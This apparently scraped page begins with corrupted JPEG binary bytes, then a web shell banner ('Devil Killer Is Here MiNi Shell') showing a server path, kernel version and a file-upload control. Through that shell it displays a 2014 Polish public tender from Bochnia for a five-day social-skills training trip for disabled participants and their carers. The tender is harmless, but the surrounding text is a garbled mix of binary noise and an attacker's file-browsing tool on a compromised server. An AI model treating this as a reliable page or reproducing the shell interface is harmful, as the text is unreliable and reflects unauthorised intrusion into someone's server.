JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140731/166673-N-2014.html

<p class="kh_header"><b>Bochnia: Wyjazdowy trening kompetencji i umiejętności społecznych na pięć dni dla uczestników projektu oraz osób z otoczenia w ramach realizowanego projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim</b><br>
<b>Numer ogłoszenia: 166673 - 2014; data zamieszczenia: 31.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. G. Windakiewicza 9/5, 32-700 Bochnia, woj. małopolskie, tel. 14 611 97 40, faks 14 611 97 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyjazdowy trening kompetencji i umiejętności społecznych na pięć dni dla uczestników projektu oraz osób z otoczenia w ramach realizowanego projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja wyjazdowego treningu kompetencji i umiejętności społecznych dla wybranych uczestników projektu oraz osób z ich otoczenia. W treningu uczestniczyć będzie maksymalnie 52 osoby z terenu Powiatu Bocheńskiego, tj. 28 osób niepełnosprawnych, głównie z powodu chorób psychicznych i upośledzenia umysłowego, w tym jedna osoba poruszająca się na wózku inwalidzkim oraz 24 osoby z ich najbliższego otoczenia, tj. asystenci/opiekunowie, członkowie rodzin, którzy potrafią zapewnić odpowiednią pomoc. Wśród uczestników są osoby, które posiadają niepełnosprawność sprzężoną. 
Celem wyjazdowego treningu kompetencji i umiejętności społecznych dla uczestników projektu oraz osób z ich najbliższego otoczenia.

Nadrzędnym celem organizacji wyjazdowego treningu kompetencji i umiejętności społecznych jest ukształtowanie kompetencji i umiejętności społecznych ułatwiających integrację społeczną poprzez aktywne formy integracji i pracę socjalną
Cele szczegółowe wyjazdowego treningu kompetencji i umiejętności społecznych:
umożliwienie rozwoju uczestnikom poprzez doświadczenie zmiany środowiska zamieszkania i zwykłego programu dnia, integracja wewnątrzśrodowiskowa uczestników treningu, rozwój i wzmocnienie kontaktów interpersonalnych, trening umiejętności współpracy w grupie w związku z doświadczeniem nowego środowiska pobytu, wzrost aktywności i zaradności osobistej i społecznej w rozumieniu współpracy, poprawa samopoczucia psychicznego w wybranej grupie UP i ich otoczenia, poprawa umiejętności autoprezentacji, komunikowania się w grupie i rozwiązywania konfliktów nabycie wiedzy nt. zdrowego stylu życia uwzględniającego właściwą dietę, ruch, aktywne formy wypoczywania wspólnie z innymi osobami, ćwiczenie zdolności radzenia sobie w sytuacjach trudnych, ćwiczenie umiejętności przystosowania.
Program wyjazdowego treningu kompetencji i umiejętności społecznych powinien obejmować: Trening funkcji poznawczych (ćwiczenie skupiania uwagi, pamięci, orientacji oraz funkcji językowych i przestrzennych) - 2,5 godzin do osób niepełnosprawnych (ON) Warsztaty z zakresu komunikacji interpersonalnej obejmujące naukę: inicjowania rozmowy, zadawania pytań, słuchania, odmawiania, dyskutowania oraz wyrażania i przyjmowania krytyki - 10 godzin z podziałem na 2 grup, tj 5 godzin dla osób niepełnosprawnych i 5 godzin dla otoczenia (OT) Trening kompetencji i umiejętności społecznych - 2,5 godziny; do osób niepełnosprawnych (ON), Trening zdolności komunikacyjnych, pewności siebie, zdolności radzenia sobie w sytuacjach trudnych w czasie wspólnego ogniska integracyjnego - 2 godziny; Warsztaty nt. autoprezentacji - 2 godziny; Działania o charakterze profilaktyczno-zdrowotnym z zakresu zapobiegania chorobom związanym ze stylem życia, odżywianie: dieta a zdrowie, promocja zdrowia - 3 godziny; Trening otwartości i konsekwencji w decyzji o aktywnych formach dbania o własne zdrowie - ćwiczenia fizyczne usprawniające psychoruchowo w formie kinezyterapii - 10 godzin; Trening zdolności komunikacyjnych, pewności siebie, zdolności radzenia sobie w sytuacjach trudnych w czasie wieczoru ze wspólnym śpiewaniem przy akompaniamencie muzycznym - 2,5 godziny; Zajęcia obejmujące zasady i sposoby wzbudzania motywacji u osób niepełnosprawnych z dysfunkcjami psychicznymi i umysłowymi - 2 godziny dla otoczenia Zajęcia dotyczące sposobów radzenia sobie z własnymi emocjami w trudnych sytuacjach, w kontekście funkcjonowania w otoczeniu osoby/osób niepełnosprawnych - 2 godziny dla otoczenia (OT) Trening zdolności komunikacyjnych, pewności siebie, zdolności radzenia sobie w sytuacjach trudnych w czasie rozgrywek sportowych i rywalizacji - 3 godziny; Trening umiejętności odnajdywania się w sytuacjach społecznych, przystosowania się, ćwiczenie sposobów zmniejszania doświadczanego napięcia, nauka poruszania się w nieznanej przestrzeni w czasie wycieczki poza ośrodek - 6,5 godziny; Warsztaty nt. rozwiązywania konfliktów - 7 godzin; Trening umiejętności przystosowania, obejmujące zagadnienia związane z kwaterunkiem oraz przygotowaniem do wyjazdów poza teren ośrodka - 2,5 godziny; Zamawiający wymaga, aby w każdym dniu, w którym realizowane będzie zlecenie przeprowadzono co najmniej 6 godzin  zajęć z zakresu aktywnej integracji w formie treningów, warsztatów i wykładów. Szczegółowy harmonogram treningu kompetencji i umiejętności społecznych, stanowi załącznik nr 8 do SIWZ. Prowadzący zajęcia powinni zapewnić uczestnikom zajęć poczucie bezpieczeństwa, akceptacji oraz przynależności do grupy. Wykonawca zobowiązany będzie do zadbania o prawidłowe interakcje uczestników podczas treningu według zasad życia społecznego. Wykonawca zobowiązany będzie ponadto, do zapewnienia pomocy i wsparcia przy przemieszczaniu się osoby niepełnosprawnej poruszającej się na wózku inwalidzkim, w tym m.in. pomoc przy wnoszeniu i wynoszeniu z autokaru, poruszaniu się w miejscach publicznych, itp.  Kwestie organizacyjne treningu 5 dniowego: Przewóz uczestników na trasie Łapanów - miejsce organizacji treningu - Łapanów. Wykonawca zapewni przejazd dla maksymalnie 52 osób na trasie z Łapanów do miejsca realizacji usługi w dniu 20 sierpnia 2014 r. oraz w dniu 24 sierpnia 2014 r. z miejsca realizacji usługi do Łapanowa, autokarem, który winien posiadać adekwatną ilość miejsc do ilości uczestników. Autokar powinien posiadać aktualny przegląd techniczny, spełniać warunki dla przewozów turystycznych stosowanych przeciętnie w organizacji wycieczek krajowych. Wykonawca pokryje także koszty ewentualnych opłat parkingowych na postojach oraz innych opłat, związanych z przejazdem. Zakwaterowanie: Ośrodek musi posiadać wpis do rejestru ośrodków, w których mogą odbywać się turnusy rehabilitacyjne, prowadzonego przez właściwego Wojewodę. Ośrodek powinien posiadać sale do prowadzenia zajęć wykładowo-warsztatowych, które są wyposażone w stoliki i krzesła. Organizator obowiązany jest zapewnić zakwaterowanie osób w następującej konfiguracji: w dwóch pokojach 1-osobowych, w tym jeden pokój przystosowany do potrzeb osoby niepełnosprawnej poruszającej się na wózku inwalidzkim, trzech pokojach 3-osobowych, jednym pokoju 4-osobowym i dziewiętnastu pokojach 2-osobowych lub w dwóch pokojach 1-osobowych, w tym jeden pokój przystosowany do potrzeb osoby niepełnosprawnej poruszającej się na wózku inwalidzkim, trzech pokojach 3-osobowych, pięciu pokojach 4 - osobowych i jedenastu pokojach 2 - osobowych lub w dwóch pokojach 1- osobowych, w tym jeden pokój przystosowany do potrzeb osoby niepełnosprawnej poruszającej się na wózku inwalidzkim, trzech pokojach 3-osobowych, cztery pokojach 4-osobowych i trzynastu pokojach 2-osobowych. Ośrodek, w którym zakwaterowane będą osoby musi posiadać dźwig osobowy lub platformę schodową w części przeznaczonej dla gości niezależnie od ilości kondygnacji (wymóg ten nie będzie obowiązywał w przypadku, gdy zarówno sala szkoleniowa, stołówka jak i pokój mieszkalny dostosowane do potrzeb osób niepełnosprawnych znajdować się będą na parterze).Każdy pokój musi mieć dostęp do pełnego węzła sanitarnego (wc, umywalka, natrysk z całodobowym dostępem do ciepłej i zimnej wody). Osoby muszą być zakwaterowane w jednym budynku, w pokojach rozmieszczonych blisko siebie. W pokojach powinny znajdować się jednoosobowe łóżka z pościelą (wyklucza się łóżka piętrowe), szafa na ubrania, krzesła/fotele i stolik. Zamawiający nie dopuszcza możliwości zakwaterowania osób różnych płci w tym samym pokoju z wyłączeniem małżeństw oraz rodzeństwa lub rodziców/opiekunów.Dla uczestników wymagany jest całodobowy dostęp do kuchni lub aneksu kuchennego, w którym powinny się znajdować: czajnik bezprzewodowy, kubki/szklanki, łyżeczki oraz uzupełniane w miarę potrzeb: kawa, herbata, cukier, cytryna i mleczko w ilości adekwatnej do liczby uczestników treningu. Dodatkowo wymagane jest, aby: Sala lub sale, w których będą odbywać się zajęcia kinezyterapeutyczne znajdowały się w budynku, w którym będą zakwaterowani uczestnicy; Wykonawca dysponował co najmniej dwiema salami szkoleniowymi na terenie ośrodka przystosowanymi do przeprowadzenia warsztatów/zajęć/spotkań dla uczestników treningu (sale muszą być wyposażone w odpowiednią liczbę stolików i miejsc siedzących); Wykonawca zagwarantował całodobową opiekę medyczną, w tym w razie potrzeby dostęp do psychologa i psychiatry oraz zapewnił i opłacił ewentualny transport chorego uczestnika do placówki pomocy medycznej/szpitala. Wyżywienie. Wykonawca zapewni uczestnikom wyjazdowego treningu całodzienne wyżywienie składające się z 3 posiłków: śniadania, dwudaniowego obiadu wraz z deserem i kolacji. Serwowane posiłki powinny zapewniać dzienne zapotrzebowanie kaloryczne dla 1 osoby, tj. minimum  2600 - 2800 kcal. Dania powinny być urozmaicone w produkty różnych grup produktów spożywczych. Każdy posiłek powinien zawierać warzywa lub owoce. Zamawiający wyklucza podawanie posiłków w formie szwedzkiego stołu. Żywienie powinno odbywać się zgodnie z zasadami racjonalnego żywienia oraz z zachowaniem higieny i obowiązujących uczestników diet (wynikających z posiadających schorzeń), o których Wykonawca zostanie poinformowany  na 2 dni przed przyjazdem grupy uczestników. Posiłki serwowane w pierwszym dniu wyjazdu, obejmować mają drugie śniadanie i obiad. Nadto Wykonawca zobowiązany będzie do zapewnienia prowiantu na zajęcia popołudniowe. Dodatkowo, Zamawiający wymaga, aby Wykonawca zapewnił na każdy dzień świadczenia usługi: świeże ciastka 1 kg (wafelki, ciastka kruche), paluszki, 6 litrów soków owocowych (jabłkowy i/lub pomarańczowy), wodę mineralną gazowaną i niegazowaną, kawę rozpuszczalną, herbatę, cukier, śmietankę do kawy (w postaci płynnej), cytryny, owoce, które będą podawane w czasie zajęć suchy prowiant napoje na czas zajęć prowadzonych poza ośrodkiem. Wykonawca zobowiązany jest zapewnić odpowiednie do podawanych posiłków naczynia i sztućce w ilości adekwatnej do liczby osób biorących udział w zajęciach, wyklucza się możliwość stosowania sztućców plastikowych. Wykonawca zobowiązany będzie do wykupienia ubezpieczenie NNW dla maksymalnie 52 osób uczestniczących w wyjazdowym treningu w tym na czas przejazdów i pobytu na kwotę 10.000 zł od osoby. Kserokopię dokumentu potwierdzającą ubezpieczenie Wykonawca przedłoży Zamawiającemu w dniu rozpoczęcia wyjazdowego treningu (dopuszcza się możliwość przesłania skanu polisy drogą e-mail a następnie pocztą tradycyjną przesłanie kserokopii dokumentu potwierdzonej za zgodność z oryginałem) Wykonawca w ofercie wskaże kwalifikacje zawodowe osób, które będą uczestniczyć w realizacji zamówienia, ich funkcje i zadania oraz oświadczy, iż osoby te posiadają aktualne uprawnienia zawodowe w zakresie przedmiotu zamówienia. Personel zaangażowany przez wykonawcę do realizacji usług objętych niniejszym zamówieniem powinien charakteryzować się profesjonalizmem oraz doświadczeniem w kontaktach z osobami niepełnosprawnymi. Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników 5-dniowego treningu o 7 osób. O dokładnej liczbie uczestników treningu Zamawiający poinformuje najpóźniej na 2 dni przed planowaną datą realizacji zamówienia. Zamawiający zapłaci za faktyczną liczbę uczestników, jednak nie mniej niż 45 osób. Wykonawca jest zobowiązany do opłacenia opłaty uzdrowiskowej/miejscowej za wszystkie osoby przebywające na wyjazdowym treningu - jeśli wymagać tego będzie lokalizacja ośrodka. Wykonawca ponosi wyłączną odpowiedzialność za właściwą realizację przedmiotu zamówienia. W celu zapewnienia właściwej promocji realizowanego przez Zamawiającego projektu finansowanego ze środków UE Wykonawca umożliwi umieszczenie w obiekcie stosownych informacji w formie 10 szt. afiszy przekazanych Wykonawcy przez Zamawiającego. Miejscowość, w której realizowane będzie zamówienie winna charakteryzować się  walorami wypoczynkowymi i krajoznawczymi z mikroklimatem górskim oraz możliwością organizacji pieszych wycieczek. Miejsce realizacji treningu powinno znajdować się poza obszarem Powiatu Bocheńskiego, w odległości nie mniejszej niż  70 km i nie większej niż 150 km od miasta Bochnia. Obiekt wraz z zapleczem rekreacyjno-sportowym, w którym zakwaterowani będą uczestnicy musi być przystosowany do przyjmowania zorganizowanych grup osób niepełnosprawnych. Wymagania niezbędne względem osób prowadzących trening: trener umiejętności interpersonalnych - wykształcenie psychologiczne lub pedagogiczne i min. 2 letnie doświadczenie w wykonywaniu zawodu, fizjoterapeuta - wykształcenie wyższym magisterskim na kierunku fizjoterapia lub na kierunku rehabilitacja ruchowa i min. 2 letnie doświadczenie w wykonywaniu zawodu, dietetyk - wykształcenie średnim w zawodzie dietetyka i/lub ukończone studia wyższe na kierunku dietetyka, gdzie uzyskał tytuł licencjata lub magistra na tym kierunku, lub rozpoczął przed dniem 1 października 2007 r. studia wyższe w specjalności dietetyka, obejmujące co najmniej 1784 godziny kształcenia w zakresie dietetyki i uzyskała tytuł licencjata lub magistra na tym kierunku, lub rozpoczęła przed dniem 1 października 2007 r. studia wyższe na kierunku technologia żywności i żywienie człowieka o specjalności żywienie człowieka i uzyskała tytuł licencjata lub magistra lub magistra inżyniera na tym kierunku, lub ukończyła szkołę policealną publiczną lub niepubliczną z uprawnieniami szkoły publicznej i uzyskała dyplom dietetyka, lub rozpoczęła przed 1993 r. szkołę policealną i uzyskała dyplom technika technologii żywienia w specjalności dietetyka.Dodatkowe wymagania względem Wykonawcy, a w szczególności względem osób prowadzących trening: predyspozycje osobowościowe, komunikatywność, łatwość nawiązywania kontaktów w szczególności z osobami niepełnosprawnymi, wysoka kultura osobista, odpowiedzialność posiadanie doświadczenia w pracy z osobami niepełnosprawnymi  posiadanie dokumentów potwierdzających doświadczenie w pracy z osobami niepełnosprawnymi Wymagane dokumenty najpóźniej  w dniu podpisania umowy. Kserokopie dokumentów potwierdzających wykształcenie osób prowadzących zajęcia; Inne dokumenty o posiadanych kwalifikacjach i doświadczeniu osób prowadzących zajęcia; Oświadczenie o korzystaniu z pełni praw publicznych oraz o niekaralności osoby prowadzącej zajęcia; Ewentualne referencje; konspekty zajęć; Wykonawca zobowiązany jest do przedstawienia Zamawiającemu następujące dokumenty: Konspekty zajęć zawierające min.: czas trwania, datę realizacji, metody pracy, imię i nazwisko osoby prowadzącej zajęcia konspekty zajęć zawierające m.in.: temat zajęć, czas trwania, datę realizacji, metody pracy, imię i nazwisko osoby prowadzącej zajęcia konspekt powinien zawierać streszczenie treningu/zajęć /warsztatu wskazujące na związek z celami treningu/zajęć/warsztatu, wskazanie środków, metod, narzędzi użytych do osiągnięcia zakładanego celu programu powinien być powiązany z planowanym wynikiem treningu/zajęć/warsztatu i wprost określać wyniki. Konspekt powinien wskazywać jakie czynności wykonali uczestnicy i jakie czynności wykonał trener, co było przez uczestników poznawane, ćwiczone, przeżywane, doskonalone itp. W celu właściwego określenia celów szczegółowych treningu/zajęć/warsztatu trener musi wziąć pod uwagę poziom wyjściowy uczestników treningu określony w SIWZ i treści określone tematem wskazanym w SIWZ; zdjęcia z wykonania zasadniczych punktów zamówienia zapisane na płycie CD; kserokopia ubezpieczenia uczestników NNW; sprawozdanie zawierające opis realizacji usługi od strony organizacyjnej i merytorycznej przebiegu treningu w poszczególnych punktach programu, ocenę efektów, opis rezultatów, wskazanie w związku z konspektami jakich wyniki zostały osiągnięte przez uczestników, jakie kompetencje i umiejętności zostały zdobyte, odzyskane lub utrwalone, opis wystąpienia ewentualnych nieprzewidzianych zdarzeń itp.; wykaz osób realizujących zamówienie wraz z opisem wykształcenia i doświadczenia. Dokumentacja jaką Wykonawca przekażę Zamawiającemu po zrealizowaniu treningu: lista potwierdzająca korzystanie z przewozu; potwierdzenie  korzystania z programu dnia, posiłków i noclegów w trakcie realizacji wyjazdowego treningu kompetencji i umiejętności społecznych; konspekty zajęć zawierające m.in.: temat zajęć, czas trwania, datę realizacji, metody pracy, imię i nazwisko osoby prowadzącej zajęcia; zdjęcia z wykonania zasadniczych punktów zamówienia zapisane na płycie CD; kserokopia ubezpieczenia uczestników NNW; Wykonawca będzie zobligowany do znaczenia afiszem promocyjno-informacyjnym miejsca, w którym realizowany będzie trening..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert

wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie

wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku Zamawiający uzna wykazanie się przez Wykonawcę dysponowaniem miejscem położonym w odległości nie mniejszej niż 70 km i nie większej niż 150 km od miasta Bochnia, przy czym obiekt musi spełniać wymogi określone w opisie przedmiotu zamówienia. w  formie oświadczenia
za spełnienie powyższego warunku Zamawiający uzna wykazanie się przez Wykonawcę dysponowaniem autokarem do przewozu maksymalnie 52 osób 
w formie oświadczenie

wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami 

wg formuły spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

wf formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnieniu warunków określonych przepisami art 22 ust 1 ustawy
oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 ustawy 
aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
Oświadczenie że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, załącznik nr 2 do SIWZ
Formularz ofertowy 
Dokument (np. pełnomocnictwo, umowa spółki cywilnej, zaświadczenie o wpisie do ewidencji działalności gospodarczej, itp) potwierdzający, iż oferta została podpisana przez osoby/ę uprawnioną do reprezentowania Wykonawcy - o ile nie wynika to z innych dokumentów załączonych do oferty. 
Zaakceptowany wzór umowy 
